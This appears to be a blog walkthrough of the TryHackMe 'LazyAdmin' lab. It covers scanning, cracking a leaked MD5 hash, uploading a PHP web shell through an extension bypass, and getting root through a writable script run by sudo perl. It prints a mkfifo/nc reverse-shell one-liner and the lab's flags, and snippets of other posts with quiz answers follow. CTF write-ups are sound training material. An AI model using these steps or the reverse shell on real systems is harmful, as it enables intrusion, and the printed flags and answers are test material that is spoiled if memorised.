Skip to main content

LazyAdmin - writeup

 Tryhackme - LazyAdmin

 


 NMAP - Network mapping

 #command - nmap -sT -vv -sC -sV 10.10.126.215

 

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo0a0DBybd2oCUPGjhXN1BQrAhbKKJhN/PW2OCccDm6KB/+sH/2UWHy3kE1XDgWO2W3EEHVd6vf7SdrCt7sWhJSno/q1ICO6ZnHBCjyWcRMxojBvVtS4kOlzungcirIpPDxiDChZoy+ZdlC3hgnzS5ih/RstPbIy0uG7QI/K7wFzW7dqMlYw62CupjNHt/O16DlokjkzSdq9eyYwzef/CDRb5QnpkTX5iQcxyKiPzZVdX/W8pfP3VfLyd/cxBqvbtQcl3iT1n+QwL8+QArh01boMgWs6oIDxvPxvXoJ0Ts0pEQ2BFC9u7CgdvQz1p+VtuxdH6mu9YztRymXmXPKJfB
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC8TzxsGQ1Xtyg+XwisNmDmdsHKumQYqiUbxqVd+E0E0TdRaeIkSGov/GKoXY00EX2izJSImiJtn0j988XBOTFE=
|   256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILe/TbqqjC/bQMfBM29kV2xApQbhUXLFwFJPU14Y9/Nm
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Here , 22 and 80 ports are open..

HTTP

we can able to conclude that there is an http service is running on the machine lets check that service and will start to enumerating it.


 

Enumeration 

For enumeration we are going to do find the hidden directories of the webserver using our favorite tool called gobuster.

#Command - gobuster dir -u http://10.10.126.215  -w /usr/share/dirb/wordlists/common.txt -x txt,php

 

Here, we got hidden directory.. /content

 

 

again ..we try gobuster find some hidden directory...

#Command - gobuster dir -u http://10.10.126.215/content  -w /usr/share/dirb/wordlists/common.txt -x txt,php

/images                                                                /inc                                              /index.php                                                       
/index.php 

 

After the gobuster scan we found some interesting folders and in that there is a really interesting folder called /inc lets check what it has.

 


here,DB related files lets check mysqlbackup folder here. It contains a MYSQL backup file lets download this and see whether it has have any interesting information ..

 


Here i found the credential for login:

and we found some md5 hash username is manager The password is a MD5 hash. So let’s use a md5 decrypt online and i found the password.

links here - https://crackstation.net/

 

try crackstation ..


 

 

let's check  hidden directory /as ..and login to the page.
 



We are in the admin page. Now let’s try to upload our shell.

Navigate to Media -> Upload. I’ve tried to upload the .php shell, but the web refused this extension. So change .php5 to .phtml and upload.

 


 click to shell.php5. Now start a listener on our machine and now we’ve got our shell. 

nc -lvnp <port>



user flag 

# cd /home

#ls

itguy

#cd itguy

#ls

#cat user.txt
THM{63e5bce9271952aad1113b6f1ac28a07} 

Now let’s try to get root. We’re gonna spawn a tty using this python script:

#python -c 'import pty;pty.spawn("/bin/bash")' 

 

privilege Escalation

then sudo -l to check which command we can use as root.
 
 www-data@THM-Chal:/home/itguy$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
 
 
Well we can run Perl and the file backup.pl without password. Let’s check content of backup.pl

www-data@THM-Chal:/home/itguy$ cat backup.pl
cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

we don't try to any reverse shell here ! just command and execute .

root flag

let's check here - https://guif.re/linuxeop

www-data@THM-Chal:/home/itguy$ cd /etc
cd /etc
www-data@THM-Chal:/etc$ echo 'exec "/bin/sh"' > copy.sh
echo 'exec "/bin/sh"' > copy.sh
www-data@THM-Chal:/etc$ sudo /usr/bin/perl /home/itguy/backup.pl
sudo /usr/bin/perl /home/itguy/backup.pl
# whoami
whoami
root
# cd /root
cd /root
# cat root.txt
cat root.txt
THM{6637f41d0177b6f37cb20d775124699f}


 

 

 

Comments

Post a Comment

Popular posts from this blog

Windows Fundamentals 2

 TryHackMe - Windows Fundamentals 2 Task 1 Introduction  #1 :- Read above and start the virtual machine.  Answer :- No Answer Needed Task 2 System Configuration   #2.1 :- What is the name of the service that lists Systems Internals as the manufacturer?  Answer :- PsShutdown #2.2 :- Whom is the Windows license registered to? Answer :- Windows User #2.3 :- What is the command for Windows Troubleshooting? Answer :- C:\Windows\System32\control.exe /name Microsoft.Troubleshooting #2.4 :- What command will open the Control Panel? (The answer is  the name of .exe, not the full path) Answer :- control.exe Task 3 Change UAC Settings  #3 :- What is the command to open User Account Control Settings? (The answer is the name of the .exe file, not the full path)  Answer :- UserAccountControlSettings.exe Task 4 Computer Management  #4.1 :- What is the command to open Computer Management? (The answer is the name of the .msc file, not the full
Post a Comment
Read more

Windows Fundamentals 3

 Tryhackme - Windows Fundamentals 3   Task-1 Introduction  #1:- Read the above and start the virtual machine.  Answer:- No Answer Needed Task-2 Windows Updates  #2:- There were two definition updates installed in the attached VM. On what date were these updates installed?  Answer:- 5/3/2021 Task-3 Windows Security  #3:- In the above image, which area needs immediate attention?  Answer:- virus & threat protection Task-4 Virus & threat protection  #4:- Specifically, what is turned off that Windows is notifying you to turn on?  Answer:- Real-time protection Task-5 Firewall & network protection  #5:- If you were connected to airport Wi-Fi, what most likely will be the active firewall profile?  Answer:- public network Task-6 App & browser control  #6:- Read the above.  Answer:- No Answer Needed Task-7 Device security  #7:- What is the TPM?  Answer:- Trusted Platform Module Task-8 BitLocker #8:- What must a user insert on computers that DO NOT have a TPM version 1.2 or la
Post a Comment
Read more

Linux Fundamentals Part 1

TryHackMe - Linux FundamentalsPart 1  #1 :- Research: What year was the first release of a Linux operating system?  Answer :-1991  #2 :- if we wanted to output the text "TryHackMe", what would our command be?  Answer :-echo TryHackMe  #3 :- What is the username of who you're logged in as on your deployed Linux machine? Answer :-tryhackme #4 :- On the Linux machine that you deploy, how many folders are there?    Answer :-2 #5 :- Which directory contains a file?  Answer :-folder4 #6 :- What is the contents of this file? Answer :-Hello World #7 :- Use the cd command to navigate to this file and find out the new current working directory. What is the path? An
Post a Comment
Read more